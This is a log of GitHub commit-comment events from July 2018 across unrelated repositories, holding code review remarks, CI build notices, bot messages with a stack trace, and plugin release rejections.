{"id":"7999685841","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29791153,"position":null,"line":null,"path":null,"commit_id":"19b80848ccf75859677c039fa4172b30ef547db2","created_at":"2018-07-22T05:45:10Z","updated_at":"2018-07-22T05:45:10Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-19b80848ccf75859677c039fa4172b30ef547db2-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-22T05:45:10Z"}
{"id":"7999688155","type":"CommitCommentEvent","actor":{"login":"Mark-Jung"},"repo":{"name":"PerfDevTeam/perf_landing"},"payload":{"comment":{"id":29791160,"position":24,"line":50,"path":"perf/src/pages/CheckOut/CheckOut.js","commit_id":"40d0b11844f49e215afcbe0268951ecac936384c","created_at":"2018-07-22T05:47:54Z","updated_at":"2018-07-22T05:47:54Z","author_association":"CONTRIBUTOR","body":"snooping in here, but when we bring in sth from state to props, we bring it as a const to make sure that the value only changes in the way we know it will. Making sth from props a variable is going against the idea of that."}},"created_at":"2018-07-22T05:47:54Z"}
{"id":"7999689336","type":"CommitCommentEvent","actor":{"login":"satishvvv"},"repo":{"name":"satishvvv/satish"},"payload":{"comment":{"id":29791161,"position":null,"line":null,"path":null,"commit_id":"ec3833d787b25f3ff55e6ac2416af809ed836193","created_at":"2018-07-22T05:49:16Z","updated_at":"2018-07-22T05:49:16Z","author_association":"OWNER","body":"IT IS THE SAMPLE TEST FILE"}},"created_at":"2018-07-22T05:49:16Z"}
{"id":"7999689595","type":"CommitCommentEvent","actor":{"login":"rpv-tomsk"},"repo":{"name":"collectd/collectd"},"payload":{"comment":{"id":29791162,"position":null,"line":null,"path":null,"commit_id":"430f41edba3d13ea1697319c94a2e104f98685ff","created_at":"2018-07-22T05:49:36Z","updated_at":"2018-07-22T05:49:36Z","author_association":"CONTRIBUTOR","body":"@octo, this typo is really nice, isn't it?"}},"created_at":"2018-07-22T05:49:36Z"}
{"id":"7999691122","type":"CommitCommentEvent","actor":{"login":"Daniel4rt"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29791164,"position":5,"line":229,"path":"src/map/log.cpp","commit_id":"91169d7ebccccaf5008076383c89ff3a6c514a9e","created_at":"2018-07-22T05:51:15Z","updated_at":"2018-07-22T05:51:15Z","author_association":"NONE","body":"oh i see, thanks <3"}},"created_at":"2018-07-22T05:51:15Z"}
{"id":"7999693113","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29791167,"position":null,"line":null,"path":null,"commit_id":"b084d3e6e33f1dc3f6765e08ce467c07bf8496b9","created_at":"2018-07-22T05:53:26Z","updated_at":"2018-07-22T05:53:26Z","author_association":"OWNER","body":"Hi from gradle"}},"created_at":"2018-07-22T05:53:26Z"}
{"id":"7999694010","type":"CommitCommentEvent","actor":{"login":"xiaozhuai"},"repo":{"name":"lifei6671/mindoc"},"payload":{"comment":{"id":29791168,"position":null,"line":null,"path":null,"commit_id":"6921b2ed40b1b43cba4238f982367e3239ff28a9","created_at":"2018-07-22T05:54:27Z","updated_at":"2018-07-22T05:54:27Z","author_association":"NONE","body":"cdnimg"}},"created_at":"2018-07-22T05:54:27Z"}
{"id":"7999694065","type":"CommitCommentEvent","actor":{"login":"ZeroEpoch1969"},"repo":{"name":"TFPatches/TotalFreedomMod"},"payload":{"comment":{"id":29791169,"position":null,"line":null,"path":null,"commit_id":"cae068a15196f2a0d3f442b60f60a397e5ec60aa","created_at":"2018-07-22T05:54:31Z","updated_at":"2018-07-22T05:54:31Z","author_association":"MEMBER","body":"There are a lot of things that don't work. The most critical is the flatlands generator doesn't work, as I have to wait for the spigot development team to fix the world generator on spigot itself. Which probably won't be for a while. "}},"created_at":"2018-07-22T05:54:31Z"}
{"id":"7999694176","type":"CommitCommentEvent","actor":{"login":"xiaozhuai"},"repo":{"name":"lifei6671/mindoc"},"payload":{"comment":{"id":29791170,"position":null,"line":null,"path":null,"commit_id":"6921b2ed40b1b43cba4238f982367e3239ff28a9","created_at":"2018-07-22T05:54:38Z","updated_at":"2018-07-22T05:54:38Z","author_association":"NONE","body":"拼错了"}},"created_at":"2018-07-22T05:54:38Z"}
{"id":"7999696145","type":"CommitCommentEvent","actor":{"login":"choalover"},"repo":{"name":"choalover/EmpiralMP"},"payload":{"comment":{"id":29791171,"position":null,"line":null,"path":null,"commit_id":"da703b11bf2515fa5af26ef7a40e28af329dcd46","created_at":"2018-07-22T05:56:29Z","updated_at":"2018-07-22T05:56:29Z","author_association":"OWNER","body":"I'm planning to finish up warp support tomorrow, then I will push a new commit."}},"created_at":"2018-07-22T05:56:29Z"}
{"id":"7999698609","type":"CommitCommentEvent","actor":{"login":"killghost2017"},"repo":{"name":"killghost2017/test"},"payload":{"comment":{"id":29791179,"position":10,"line":10,"path":"index.html","commit_id":"79354c21a14a2f2f0c9952a2ff906e60ecc49259","created_at":"2018-07-22T05:59:14Z","updated_at":"2018-07-22T05:59:14Z","author_association":"OWNER","body":"<h2>Hellow World!</h2>"}},"created_at":"2018-07-22T05:59:14Z"}
{"id":"7999699105","type":"CommitCommentEvent","actor":{"login":"lifei6671"},"repo":{"name":"lifei6671/mindoc"},"payload":{"comment":{"id":29791180,"position":null,"line":null,"path":null,"commit_id":"6921b2ed40b1b43cba4238f982367e3239ff28a9","created_at":"2018-07-22T05:59:48Z","updated_at":"2018-07-22T05:59:48Z","author_association":"OWNER","body":"刚提交，你就发现了。。。"}},"created_at":"2018-07-22T05:59:48Z"}
{"id":"7999700219","type":"CommitCommentEvent","actor":{"login":"marcodicro"},"repo":{"name":"facucompe/taekwongo-frontend"},"payload":{"comment":{"id":29791190,"position":13,"line":10,"path":"taekwongoFront/components/Rules.js","commit_id":"74fef48e01b2ab38f45a680ba148aeb1457446ad","created_at":"2018-07-22T06:00:41Z","updated_at":"2018-07-22T06:00:41Z","author_association":"COLLABORATOR","body":"creo que esto deberia ser reglamento @santipcn "}},"created_at":"2018-07-22T06:00:41Z"}
{"id":"7999708012","type":"CommitCommentEvent","actor":{"login":"bdanai091033"},"repo":{"name":"rovo89/XposedInstaller"},"payload":{"comment":{"id":29791209,"position":97,"line":166,"path":"app/src/main/res/values-zh-rCN/strings.xml","commit_id":"1bf81bba6b84ed3721c0893ee452584dec22ffbc","created_at":"2018-07-22T06:08:34Z","updated_at":"2018-07-22T06:08:34Z","author_association":"NONE","body":"8f8f2d7"}},"created_at":"2018-07-22T06:08:34Z"}
{"id":"7999708182","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":29791210,"position":43,"line":88,"path":"manifest.xml","commit_id":"68ee12c32abd6aa14b9cb4d815c84b612331cd46","created_at":"2018-07-22T06:08:46Z","updated_at":"2018-07-22T06:08:46Z","author_association":"NONE","body":"Ummmm... Our libril uses 1.0 not 1.1"}},"created_at":"2018-07-22T06:08:46Z"}
{"id":"7999708276","type":"CommitCommentEvent","actor":{"login":"matthewroccocavallo"},"repo":{"name":"matthewroccocavallo/LaborScreenCapture"},"payload":{"comment":{"id":29791211,"position":7,"line":23,"path":"ScreenCapture56/Form1.cs","commit_id":"a342222437644a51a2f2b0b05ebd04fa20b22a10","created_at":"2018-07-22T06:08:52Z","updated_at":"2018-07-22T06:08:52Z","author_association":"OWNER","body":"Using Image is important for saving the screenshots on an interval.  Be prepared to use:\r\n``` C#\r\nImage img = Clipboard.GetImage();\r\nimg.Save(\"C:\\\\Users\\\\macavall\\\\Desktop\\\\TESTERTEST56.jpg\");\r\n```\r\n"}},"created_at":"2018-07-22T06:08:52Z"}
{"id":"7999708998","type":"CommitCommentEvent","actor":{"login":"matthewroccocavallo"},"repo":{"name":"matthewroccocavallo/LaborScreenCapture"},"payload":{"comment":{"id":29791213,"position":14,"line":35,"path":"ScreenCapture56/Form1.cs","commit_id":"a342222437644a51a2f2b0b05ebd04fa20b22a10","created_at":"2018-07-22T06:09:36Z","updated_at":"2018-07-22T06:09:36Z","author_association":"OWNER","body":"Frivolous spacing"}},"created_at":"2018-07-22T06:09:36Z"}
{"id":"7999709275","type":"CommitCommentEvent","actor":{"login":"matthewroccocavallo"},"repo":{"name":"matthewroccocavallo/LaborScreenCapture"},"payload":{"comment":{"id":29791214,"position":28,"line":57,"path":"ScreenCapture56/Form1.cs","commit_id":"a342222437644a51a2f2b0b05ebd04fa20b22a10","created_at":"2018-07-22T06:09:55Z","updated_at":"2018-07-22T06:09:55Z","author_association":"OWNER","body":"Frivolous spacing and comments removed."}},"created_at":"2018-07-22T06:09:55Z"}
{"id":"7999709836","type":"CommitCommentEvent","actor":{"login":"matthewroccocavallo"},"repo":{"name":"matthewroccocavallo/LaborScreenCapture"},"payload":{"comment":{"id":29791215,"position":null,"line":null,"path":null,"commit_id":"a342222437644a51a2f2b0b05ebd04fa20b22a10","created_at":"2018-07-22T06:10:30Z","updated_at":"2018-07-22T06:10:30Z","author_association":"OWNER","body":"Cleaning up the code and preparing clean up the Graphical User Interface Design."}},"created_at":"2018-07-22T06:10:30Z"}
{"id":"7999712312","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29791221,"position":27,"line":32,"path":"BankManagement/BankManagement/fileUtils.c","commit_id":"ea291552da8e820109465b30b2bde35e80a88046","created_at":"2018-07-22T06:12:48Z","updated_at":"2018-07-22T06:12:48Z","author_association":"NONE","body":"it's better to write errors to stderr. stderr it's like stdin and stdout.\r\nuse fprintf(<msg>, stderr)"}},"created_at":"2018-07-22T06:12:48Z"}
{"id":"7999712921","type":"CommitCommentEvent","actor":{"login":"EunsungKoh"},"repo":{"name":"EunsungKoh/BOJproblem"},"payload":{"comment":{"id":29791223,"position":null,"line":null,"path":null,"commit_id":"1a306741367a80ee850c5cca05f5060e9931ef40","created_at":"2018-07-22T06:13:23Z","updated_at":"2018-07-22T06:13:23Z","author_association":"OWNER","body":"14648.cpp 은 예선문제입니다."}},"created_at":"2018-07-22T06:13:23Z"}
{"id":"7999716158","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":29791230,"position":43,"line":88,"path":"manifest.xml","commit_id":"68ee12c32abd6aa14b9cb4d815c84b612331cd46","created_at":"2018-07-22T06:16:35Z","updated_at":"2018-07-22T06:16:35Z","author_association":"OWNER","body":"I am reformating my tree. My mistake, maybe more. Thank you for pointing it out."}},"created_at":"2018-07-22T06:16:35Z"}
{"id":"7999716168","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29791231,"position":7,"line":5,"path":"BankManagement/BankManagement/fileUtils.h","commit_id":"ea291552da8e820109465b30b2bde35e80a88046","created_at":"2018-07-22T06:16:35Z","updated_at":"2018-07-22T06:16:35Z","author_association":"NONE","body":"remove var name in declarations in header"}},"created_at":"2018-07-22T06:16:35Z"}
{"id":"7999718742","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/refarm-site"},"payload":{"comment":{"id":29791243,"position":null,"line":null,"path":null,"commit_id":"3c50b7e2c233d3113be90e0e1ce5a270d065e96d","created_at":"2018-07-22T06:19:15Z","updated_at":"2018-07-22T06:19:15Z","author_association":"COLLABORATOR","body":"Puzzle `343-7b06e173` disappeared from [`tests/pages/urls.py`](https://github.com/fidals/refarm-site/blob/master/tests/pages/urls.py), that's why I closed #136. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-22T06:19:15Z"}
{"id":"7999718773","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/refarm-site"},"payload":{"comment":{"id":29791244,"position":null,"line":null,"path":null,"commit_id":"3c50b7e2c233d3113be90e0e1ce5a270d065e96d","created_at":"2018-07-22T06:19:17Z","updated_at":"2018-07-22T06:19:17Z","author_association":"COLLABORATOR","body":"Puzzle `140-694a3b50` discovered in   [`tests/refarm_redirects/test_views.py`](  https://github.com/fidals/refarm-site/blob/master/tests/refarm_redirects/test_views.py)   and submitted as #151. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-22T06:19:17Z"}
{"id":"7999718793","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/refarm-site"},"payload":{"comment":{"id":29791245,"position":null,"line":null,"path":null,"commit_id":"3c50b7e2c233d3113be90e0e1ce5a270d065e96d","created_at":"2018-07-22T06:19:18Z","updated_at":"2018-07-22T06:19:18Z","author_association":"COLLABORATOR","body":"Puzzle `140-e3f06142` discovered in   [`tests/test_settings.py`](  https://github.com/fidals/refarm-site/blob/master/tests/test_settings.py)   and submitted as #152. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-22T06:19:18Z"}
{"id":"7999718820","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/refarm-site"},"payload":{"comment":{"id":29791246,"position":null,"line":null,"path":null,"commit_id":"3c50b7e2c233d3113be90e0e1ce5a270d065e96d","created_at":"2018-07-22T06:19:20Z","updated_at":"2018-07-22T06:19:20Z","author_association":"COLLABORATOR","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> GET https://api.github.com/repos/fidals/refarm-site/issues/343: 404 - Not Found // See: https://developer.github.com/v3/issues/#get-a-single-issue\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nOctokit::NotFound\nGET https://api.github.com/repos/fidals/refarm-site/issues/343: 404 - Not Found // See: https://developer.github.com/v3/issues/#get-a-single-issue\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/response/raise_error.rb:16:in `on_complete'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/response.rb:9:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/response.rb:61:in `on_complete'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/response.rb:8:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/middleware/follow_redirects.rb:73:in `perform_with_redirection'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/middleware/follow_redirects.rb:61:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/rack_builder.rb:143:in `build_response'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/connection.rb:387:in `run_request'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/connection.rb:138:in `get'\n/app/vendor/bundle/ruby/2.3.0/gems/sawyer-0.8.1/lib/sawyer/agent.rb:94:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/connection.rb:156:in `request'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/connection.rb:19:in `get'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/client/issues.rb:114:in `issue'\n/app/objects/github_tickets.rb:39:in `notify'\n/app/objects/logged_tickets.rb:36:in `notify'\n/app/objects/github_tagged_tickets.rb:36:in `notify'\n/app/objects/commit_tickets.rb:34:in `notify'\n/app/objects/emailed_tickets.rb:31:in `notify'\n/app/objects/sentry_tickets.rb:36:in `notify'\n/app/objects/diff.rb:38:in `block in notify'\n/app/objects/diff.rb:33:in `each'\n/app/objects/diff.rb:33:in `notify'\n/app/objects/job.rb:40:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-22T06:19:20Z"}
{"id":"7999719247","type":"CommitCommentEvent","actor":{"login":"katienazarova"},"repo":{"name":"the-road-to-learn-react/the-road-to-learn-react-russian"},"payload":{"comment":{"id":29791251,"position":null,"line":null,"path":null,"commit_id":"2d6b862b4b4c26d6ec1c6084f0276a5a9778e68f","created_at":"2018-07-22T06:19:47Z","updated_at":"2018-07-22T06:19:47Z","author_association":"NONE","body":":+1"}},"created_at":"2018-07-22T06:19:47Z"}
{"id":"7999731776","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29791281,"position":null,"line":null,"path":null,"commit_id":"4435a0d601f35e9251fddb3fceeb89f80a21a7e4","created_at":"2018-07-22T06:32:39Z","updated_at":"2018-07-22T06:32:39Z","author_association":"NONE","body":"I predict failure in less than 5000 games! \r\nGood luck :)"}},"created_at":"2018-07-22T06:32:39Z"}
{"id":"7999735350","type":"CommitCommentEvent","actor":{"login":"SabinDiwan"},"repo":{"name":"InterviewMap/InterviewMap"},"payload":{"comment":{"id":29791287,"position":null,"line":null,"path":null,"commit_id":"c8d477085c685f921d83e96432e5c7d754db32b4","created_at":"2018-07-22T06:36:24Z","updated_at":"2018-07-22T06:36:24Z","author_association":"NONE","body":"God.u guys got to do soooo much workkkkkkkkkkkkk and here i dont even know chiness or actually let me think wat how u write it man.or ready it but thou i understood at some point what u said in some language.not mine  i learned but i could decode the writing structure so i understood what u were trying to say so i understood.hes just trying to hard to undersstand what im trying to say.his underatnd is .answ.er.null.shoot.i read his message.answered.weote wid patience.now with more patience but guessing one more time wid pics now.thats it i guess."}},"created_at":"2018-07-22T06:36:24Z"}
{"id":"7999735461","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29791289,"position":null,"line":null,"path":null,"commit_id":"11cba0e9e107001ec92c8b5ec0995b19e3c245c0","created_at":"2018-07-22T06:36:31Z","updated_at":"2018-07-22T06:36:31Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/11cba0e9e107001ec92c8b5ec0995b19e3c245c0#commitcomment-29790943) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/28de365897a5027c6edd878694476f2ee7b74fab/daily_2018_7_22/report.md). cc @ararslan"}},"created_at":"2018-07-22T06:36:31Z"}
{"id":"7999735628","type":"CommitCommentEvent","actor":{"login":"kalmikovserg"},"repo":{"name":"kalmikovserg/kalmikov"},"payload":{"comment":{"id":29791293,"position":17,"line":17,"path":"src/com/itacademy/lesson6homeworkoop/Rectangle.java","commit_id":"e56c57ff0546e23bbf902a3f82687e68466acb89","created_at":"2018-07-22T06:36:42Z","updated_at":"2018-07-22T06:36:42Z","author_association":"OWNER","body":"public double squareArea() {\r\n        double lengthALine = leftUpAngle.distance(leftUpAngle.getX(), rightDownAngle.getY());\r\n        double lengthABLine = rightDownAngle.distance(leftUpAngle.getX(), rightDownAngle.getY());\r\n        return lengthALine * lengthABLine;\r\n    }"}},"created_at":"2018-07-22T06:36:42Z"}
{"id":"7999736570","type":"CommitCommentEvent","actor":{"login":"TynanSylvester"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29791300,"position":null,"line":null,"path":null,"commit_id":"afa3f87156d831924a32f04401d2fc38d192f4c4","created_at":"2018-07-22T06:37:47Z","updated_at":"2018-07-22T06:37:47Z","author_association":"CONTRIBUTOR","body":"It doesn't have to be a sentence. It can be like this:\r\n\r\n\"Vengeance - apprivoisement ratée\""}},"created_at":"2018-07-22T06:37:47Z"}
{"id":"7999736785","type":"CommitCommentEvent","actor":{"login":"SabinDiwan"},"repo":{"name":"InterviewMap/InterviewMap"},"payload":{"comment":{"id":29791303,"position":null,"line":null,"path":null,"commit_id":"c8d477085c685f921d83e96432e5c7d754db32b4","created_at":"2018-07-22T06:38:02Z","updated_at":"2018-07-22T06:38:02Z","author_association":"NONE","body":"Good job guys.stay blessed.knowledge is power.and hell wat a responsibility.ill share another picture wid my next email to show the quote abt it.\r\nG thx guyz.much much much thanks."}},"created_at":"2018-07-22T06:38:02Z"}
{"id":"7999739831","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"OtorisanVardo/SignEdit"},"payload":{"comment":{"id":29791306,"position":null,"line":null,"path":null,"commit_id":"fbf8f7d5b3aba14114b2c4bd39e25e18c4e4a6aa","created_at":"2018-07-22T06:40:56Z","updated_at":"2018-07-22T06:40:56Z","author_association":"NONE","body":"Dear @OtorisanVardo:\nI regret to inform you that the release you submitted, named \"**SignEdit**\" (v1.2.4), for the project [SignEdit](https://poggit.pmmp.io/ci/OtorisanVardo/SignEdit/SignEdit) on 2018-07-11T04:21:12.000Z, has been rejected.\n\nDelete these from your plugin.yml:\n\n```yml\n - 3.0.1\n - 3.0.2\n - 3.0.5\n - 4.0.0\n```\n\n3.0.1, 3.0.2 and 3.0.5 are automatically included when you write `3.0.0`.\n\nAs for 4.0.0, we do not accept submission for it because it has not been released.\n\nPlease resolve the issues listed above and submit the updated plugin again.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-22T06:40:56Z"}
{"id":"7999741437","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"OtorisanVardo/SignEdit"},"payload":{"comment":{"id":29791308,"position":null,"line":null,"path":null,"commit_id":"1965cf25ce6bd2394de08686350594851bdf1c8c","created_at":"2018-07-22T06:42:31Z","updated_at":"2018-07-22T06:42:31Z","author_association":"NONE","body":"Dear @OtorisanVardo:\nI regret to inform you that the release you submitted, named \"**SignEdit**\" (v1.3.0), for the project [SignEdit](https://poggit.pmmp.io/ci/OtorisanVardo/SignEdit/SignEdit) on 2018-07-21T04:46:41.000Z, has been rejected.\n\nPlugins supporting 4.0.0 will not be accepted, because it has not been released, and this plugin will most likely be incompatible with 4.0.0 when it gets released.\n\nAlso, you do not need to include 3.0.1 because it is already covered by 3.0.0\n\nPlease resolve the issues listed above and submit the updated plugin again.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-22T06:42:31Z"}
{"id":"7999741628","type":"CommitCommentEvent","actor":{"login":"himanshu64"},"repo":{"name":"himanshu64/exam-tester"},"payload":{"comment":{"id":29791309,"position":null,"line":null,"path":null,"commit_id":"47ed00c04623920a60247f0b18ed3876aa8a8836","created_at":"2018-07-22T06:42:41Z","updated_at":"2018-07-22T06:42:41Z","author_association":"OWNER","body":"verfied"}},"created_at":"2018-07-22T06:42:41Z"}
{"id":"7999742367","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"jhelom/CompassXYZ-plugin-pocketmine"},"payload":{"comment":{"id":29791310,"position":null,"line":null,"path":null,"commit_id":"d909d6a3e6cd62461957bbfe8abaaa1dd4c9a7a5","created_at":"2018-07-22T06:43:23Z","updated_at":"2018-07-22T06:43:23Z","author_association":"NONE","body":"Dear @jhelom:\nI regret to inform you that the release you submitted, named \"**CompassXYZ**\" (v1.3), for the project [CompassXYZ](https://poggit.pmmp.io/ci/jhelom/CompassXYZ-plugin-pocketmine/CompassXYZ) on 2018-07-22T06:01:18.000Z, has been rejected.\n\nDev API versions are not accepted. Please remove \"4.0.0+dev\" from your api list.\n\nPlease resolve the issues listed above and submit the updated plugin again.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-22T06:43:23Z"}
{"id":"7999743107","type":"CommitCommentEvent","actor":{"login":"ramontayag"},"repo":{"name":"funkyfuture/docker-rpi-syncthing"},"payload":{"comment":{"id":29791312,"position":null,"line":null,"path":null,"commit_id":"f6c01ed6374ba9311779530b2f29cc76c9e13c82","created_at":"2018-07-22T06:44:02Z","updated_at":"2018-07-22T06:44:02Z","author_association":"NONE","body":"Hi @funkyfuture this version isn't available on docker hub. Do you have to trigger it manually?"}},"created_at":"2018-07-22T06:44:02Z"}
